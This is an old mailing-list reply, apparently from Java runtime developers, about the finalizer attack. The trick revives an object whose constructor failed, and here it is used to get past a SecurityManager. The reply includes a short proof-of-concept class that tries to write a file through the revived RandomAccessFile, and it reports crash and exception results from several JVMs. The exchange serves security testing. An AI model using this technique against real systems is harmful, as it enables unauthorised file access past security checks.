RE: Small ZipFile patch

[Mark Wielaard]

Hi,

On Tue, 2003-03-04 at 23:16, Jeroen Frijters wrote:
> Yep. You can do some very tricky things with this. For every non-final
> class with a non-final finalize it is possible to obtain an initialized
> reference to an instance of that class *without* running a constructor
> by taking advantage of the fact that the finalizer runs even if the
> constructor was never invoked.

Ugh. That is terrible for trying to keep some sane security framework.
I tried the attached class which overrides RandomAccessFile. It first
installs a SecurityManager to prevent the class from actually writing to
some file, but then tries anyway by using the back-from-dead object
returned by the finalizer. The results are interesting:

kaffe 1.0.7 doesn't throw any exceptions but also doesn't write to the
file.

Kissme CVS+Classpath CVS correctly throws SecurityException then dumps
core.

gij from CVS gives the interesting:

Exception in thread "main" java.lang.ExceptionInInitializerError
*** Got java.lang.NoClassDefFoundError: gnu.gcj.runtime.NameFinder while
trying
to print stack trace.
Aborted

Blackdown-1.4.1-beta correctly gives AccessControlException and then:

Unexpected Signal : 11 occurred at PC=0x403A264C
Function=(null)+0x403A264C
Library=/opt/j2sdk1.4.1/jre/lib/i386/client/libjvm.so

Eeewwwww.

Good night,

Mark

import java.io.*;

public class IRAF extends RandomAccessFile
{
    static RandomAccessFile raf;

    IRAF(String file) throws IOException
    {
      super(file, "rw");
    }

    protected void finalize()
    {
      raf = this;
    }

    public static void main(String args[])
    {
      System.setSecurityManager(new SecurityManager());
      try { new IRAF(args[0]); } catch (Throwable t) { t.printStackTrace(); }

      while (raf == null)
      {
        new Object(); // Generate some garbage till the finalizer triggers.
      }

      try { raf.write(0xff); } catch (Throwable t) { t.printStackTrace(); }
    }
}